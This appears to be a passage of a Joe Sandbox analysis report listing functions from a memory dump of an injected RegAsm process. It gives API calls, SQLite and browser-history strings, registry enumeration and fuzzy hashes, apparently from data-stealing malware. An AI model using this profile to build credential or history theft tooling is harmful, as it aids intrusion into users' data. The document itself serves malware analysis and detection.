                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                • String ID:
                                                                                • API String ID: 1973883786-0
                                                                                • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004116FF
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                • API String ID: 2618321458-3614832568
                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004185FC
                                                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@AttributesFilememset
                                                                                • String ID:
                                                                                • API String ID: 776155459-0
                                                                                • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                • malloc.MSVCRT ref: 00417524
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                • String ID:
                                                                                • API String ID: 2308052813-0
                                                                                • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PathTemp$??3@
                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                • API String ID: 1589464350-1420421710
                                                                                • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                • String ID: Error$Error %d: %s
                                                                                • API String ID: 313946961-1552265934
                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                • API String ID: 0-1953309616
                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                • API String ID: 3510742995-272990098
                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: gj
                                                                                • API String ID: 1297977491-4203073231
                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                • String ID:
                                                                                • API String ID: 2903831945-0
                                                                                • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                • String ID:
                                                                                • API String ID: 4247780290-0
                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                • memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                • String ID:
                                                                                • API String ID: 1471605966-0
                                                                                • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                • String ID: \StringFileInfo\
                                                                                • API String ID: 102104167-2245444037
                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$??3@
                                                                                • String ID: g4@
                                                                                • API String ID: 3314356048-2133833424
                                                                                • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _memicmpwcslen
                                                                                • String ID: @@@@$History
                                                                                • API String ID: 1872909662-685208920
                                                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004100FB
                                                                                • memset.MSVCRT ref: 00410112
                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                • String ID: </%s>
                                                                                • API String ID: 3400436232-259020660
                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                • String ID: caption
                                                                                • API String ID: 1523050162-4135340389
                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                • String ID: MS Sans Serif
                                                                                • API String ID: 210187428-168460110
                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp
                                                                                • String ID:
                                                                                • API String ID: 3384217055-0
                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID:
                                                                                • API String ID: 368790112-0
